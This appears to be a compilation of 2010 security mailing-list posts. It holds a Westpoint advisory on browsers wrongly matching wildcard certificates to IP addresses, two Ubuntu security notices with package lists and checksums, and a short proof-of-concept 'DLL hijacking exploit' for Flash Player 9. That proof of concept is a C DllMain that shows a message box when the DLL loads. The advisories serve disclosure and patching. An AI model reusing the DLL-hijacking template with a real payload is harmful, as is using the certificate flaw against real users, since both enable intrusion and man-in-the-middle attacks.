wp-10-0001: Multiple Browser Wildcard Cerficate Validation Weakness
Westpoint Security Advisory --- Title:Multiple Browser Wildcard Cerficate Validation Weakness Risk Rating: Low Author: Richard Moore r...@westpoint.ltd.uk Test Cases: Simon Ward si...@westpoint.ltd.uk Date: 14 July 2010 Advisory ID#: wp-10-0001 URL: http://www.westpoint.ltd.uk/advisories/wp-10-0001.txt CVE: not yet assigned Details --- RFC 2818 covers the requirements for matching CNs and subjectAltNames in order to establish valid SSL connections. It first discusses CNs that are for hostnames, and the rules for wildcards in this case. The next paragraph in the RFC then discusses CNs that are IP addresses: 'In some cases, the URI is specified as an IP address rather than a hostname. In this case, the iPAddress subjectAltName must be present in the certificate and must exactly match the IP in the URI.' The intention of the RFC is clearly that you should not be able to use wildcards with IP addresses (in order to avoid the ability to perform man-in-the-middle attacks). Unfortunately our testing showed that this rule is not adhered to by some browsers. We created a certificate with the CN '*.168.3.48' this meets the various rules for wildcards in CNs, but should be treated as invalid since it is not a hostname. We then observed the errors reported by browsers when connecting to an https server using this certificate run on IP address 192.168.3.48. We imported the test CA used to sign the certifcate in order to perform the test. The results we saw were as follows: IE6 Regarded the IP address as matching the CN (VULNERABLE) IE7 Regarded the IP address as matching the CN (VULNERABLE) Firefox 3.6.6 Regarded the IP address as matching the CN (VULNERABLE) Chrome Regarded the IP address as matching the CN (VULNERABLE) Opera Reported the IP address did not match the CN (NOT VULNERABLE) Safari 5 (win32) Reported the IP address did not match the CN (NOT VULNERABLE) Qt (4.7 git development branch) Regarded the IP address as matching the CN (VULNERABLE) Mitigating Factors -- Obviously a good CA should refuse to issue a certificate with the CN as indicated, however there only need be one CA to issue one in error for this issue to result in the user getting no warning at all and being vulnerable to MITM. The rules for hostname matching mean that only the first octet of the IP address can contain a wildcard. This means that you must be able to control a server that matches the remainder of the IP address of your target which reduces the risk of this attack being used dramatically. Impact -- If exploited then a MITM attack can be performed allowing the guarantees SSL provides to be circumvented. Timeline 14 July 2010Limited disclosure to browser developers. 14 July 2010Added Safari result. 15 July 2010Disclosure to official browser security contacts. 15 July 2010Microsoft confirm receipt. 15 July 2010Mozilla fix ready. 18 July 2010Google confirm that Chrome will be fixed by the fix to NSS on linux, and any fix provided by Microsoft on Windows. They will therefore not be adding a work-around to the Chrome code. 4 August 2010 Microsoft confirm the issue will be fixed in a future service pack, and that the issue is low enough risk that they are not asking the information to be withheld. 10 August 2010 Patch sent to Nokia for Qt. 27 August 2010 At the time of writing the NSS (Firefox) and Qt repositories both contain fixes for this issue that will be included in their releases. -- Richard Moore, Principal Software Engineer, Westpoint Ltd, Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England Tel: +44 161 237 1028 Fax: +44 161 237 1031
[USN-974-2] Linux kernel regression
=== Ubuntu Security Notice USN-974-2August 26, 2010 linux regression https://launchpad.net/bugs/620994 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: linux-image-2.6.24-28-386 2.6.24-28.77 linux-image-2.6.24-28-generic 2.6.24-28.77 linux-image-2.6.24-28-hppa322.6.24-28.77 linux-image-2.6.24-28-hppa642.6.24-28.77 linux-image-2.6.24-28-itanium 2.6.24-28.77 linux-image-2.6.24-28-lpia 2.6.24-28.77 linux-image-2.6.24-28-lpiacompat 2.6.24-28.77 linux-image-2.6.24-28-mckinley 2.6.24-28.77 linux-image-2.6.24-28-openvz2.6.24-28.77 linux-image-2.6.24-28-powerpc 2.6.24-28.77 linux-image-2.6.24-28-powerpc-smp 2.6.24-28.77 linux-image-2.6.24-28-powerpc64-smp 2.6.24-28.77 linux-image-2.6.24-28-rt2.6.24-28.77 linux-image-2.6.24-28-server2.6.24-28.77 linux-image-2.6.24-28-sparc64 2.6.24-28.77 linux-image-2.6.24-28-sparc64-smp 2.6.24-28.77 linux-image-2.6.24-28-virtual 2.6.24-28.77 linux-image-2.6.24-28-xen 2.6.24-28.77 After a standard system update you need to reboot your computer to make all the necessary changes. Details follow: USN-974-1 fixed vulnerabilities in the Linux kernel. The fixes for CVE-2010-2240 caused failures for Xen hosts. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Gael Delalleu, Rafal Wojtczuk, and Brad Spengler discovered that the memory manager did not properly handle when applications grow stacks into adjacent memory regions. A local attacker could exploit this to gain control of certain applications, potentially leading to privilege escalation, as demonstrated in attacks against the X server. (CVE-2010-2240) Kees Cook discovered that under certain situations the ioctl subsystem for DRM did not properly sanitize its arguments. A local attacker could exploit this to read previously freed kernel memory, leading to a loss of privacy. (CVE-2010-2803) Ben Hawkes discovered an integer overflow in the Controller Area Network (CAN) subsystem when setting up frame content and filtering certain messages. An attacker could send specially crafted CAN traffic to crash the system or gain root privileges. (CVE-2010-2959) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.77.diff.gz Size/MD5: 4819400 169298bfb26a7fa1951d78000a6c9771 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.77.dsc Size/MD5: 2220 adbb314148164a8a5fa4afa4a46c8fd8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-28.77_all.deb Size/MD5: 4933264 2c8f1913bf3b4b05c561f1249a82bc9e http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28_2.6.24-28.77_all.deb Size/MD5: 8149964 3b59131a80d81deb0952ed3435dc9de4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-28.77_all.deb Size/MD5: 101476 f9143c549657c12624cb3c3802ad5c24 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-28.77_all.deb Size/MD5: 46985414 f56f1062b80dc067256ac03d4bdd0be9 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.77_amd64.udeb Size/MD5:27908 2bbc3d349b02e5aa42091f37c038efce http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.77_amd64.udeb Size/MD5: 231734 0ced2a21d7c61c774cee25a505931558 http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.77_amd64.udeb Size/MD5:52676 ebe064f174209b84b5d0c4fa22915241 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.77_amd64.udeb Size/MD5:40566 f5e3e2c23ae1df2255628e45972d http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.77_amd64.udeb Size/MD5:48498 64789f7442c067ae51b9bbd23d56e317 http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.77_amd64.udeb Size/MD5:85824 adfd97cf7b8c7fa58b8914b9236b172e http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.77_amd64.udeb Size/MD5:36314 583ee10b250984976c4c51af2dbb7159
[USN-979-1] okular vulnerability
=== Ubuntu Security Notice USN-979-1August 27, 2010 kdegraphics vulnerability CVE-2010-2575 === A security issue affects the following Ubuntu releases: Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.04: okular 4:4.2.2-0ubuntu2.1 Ubuntu 9.10: okular 4:4.3.2-0ubuntu1.1 Ubuntu 10.04 LTS: okular 4:4.4.2-0ubuntu1.1 After a standard system update you need to restart any running instances of okular to make all the necessary changes. Details follow: Stefan Cornelius of Secunia Research discovered a boundary error during RLE decompression in the TranscribePalmImageToJPEG() function in generators/plucker/inplug/image.cpp of okular when processing images embedded in PDB files, which can be exploited to cause a heap-based buffer overflow. (CVE-2010-2575) Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics_4.2.2-0ubuntu2.1.diff.gz Size/MD5:28706 783af94d0e87c6abec9fd8b9513225aa http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics_4.2.2-0ubuntu2.1.dsc Size/MD5: 2792 9d6c28d62fa9fe453831d41d974f12a4 http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics_4.2.2.orig.tar.gz Size/MD5: 3965835 7275537558d579dff5d58061572786f5 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics_4.2.2-0ubuntu2.1_all.deb Size/MD5:24352 c6e1237ce00d6521cc617e0ff06fd368 http://security.ubuntu.com/ubuntu/pool/universe/k/kdegraphics/kolourpaint_4.2.2-0ubuntu2.1_all.deb Size/MD5:24038 5f9ff387b41a338fc15e185706acae3b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/gwenview_4.2.2-0ubuntu2.1_amd64.deb Size/MD5: 1317464 9866165611eb8a20bfb7dae53c9712be http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kamera_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:90084 3bcdb445a7f155d8a9a6a844d1252ef2 http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kcolorchooser_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:30208 6d3dacf570d57f493fb2e88d695704c0 http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics-dbg_4.2.2-0ubuntu2.1_amd64.deb Size/MD5: 26469420 777c6c3d2dbc945d8476cf38ac87bfad http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kdegraphics-strigi-plugins_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:55736 f43d9feb79efe91eb26cf344bc889c9e http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kgamma_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:78168 a03f826da21e3aa4068375902e4202c8 http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kolourpaint4_4.2.2-0ubuntu2.1_amd64.deb Size/MD5: 993054 a83acad23ab01d8a7503cc0c8418dd48 http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/kruler_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:94508 592753c4c883e2d659104c713511e0fb http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/ksnapshot_4.2.2-0ubuntu2.1_amd64.deb Size/MD5: 209432 4e5c2f4c8f5dd7dab3889e1d141bb10d http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/libkdcraw7-dev_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:15952 12be8ee726595f30b4074fb9b42d0909 http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/libkdcraw7_4.2.2-0ubuntu2.1_amd64.deb Size/MD5: 230082 208c4aed97a1aa69edf0b9d74f9d65f1 http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/libkexiv2-7-dev_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:13990 5ce1dd2be305b186b1d1ab6389487d3f http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/libkexiv2-7_4.2.2-0ubuntu2.1_amd64.deb Size/MD5: 132672 d3b4bd63801344957f869d36c3902664 http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/libkipi6-dev_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:10580 15379be1a10cb43f5785ad7204fd8dea http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/libkipi6_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:80374 d91d043d151014a9c69148f1996bc320 http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/libksane-dev_4.2.2-0ubuntu2.1_amd64.deb Size/MD5: 8556 2d56470d4fc705fe8bfa87841cce039b http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/libksane0_4.2.2-0ubuntu2.1_amd64.deb Size/MD5:99368 a86c630162d858de04d262e75185732a http://security.ubuntu.com/ubuntu/pool/main/k/kdegraphics/libokularcore1_4.2.2-0ubuntu2.1_amd64.deb Size/MD5: 282598 6dc6e873d647be210183fe21340bc430
Flash Player 9 DLL Hijacking Exploit (schannel.dll)
=== Flash player 9.exe DLL Hijacking Exploit (schannel.dll) === Founded By: Securitylab.ir (Kamran Safaei Tabrizi) === include stdafx.h void init() { MessageBox(NULL,Ops, OpS!,0x0003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } =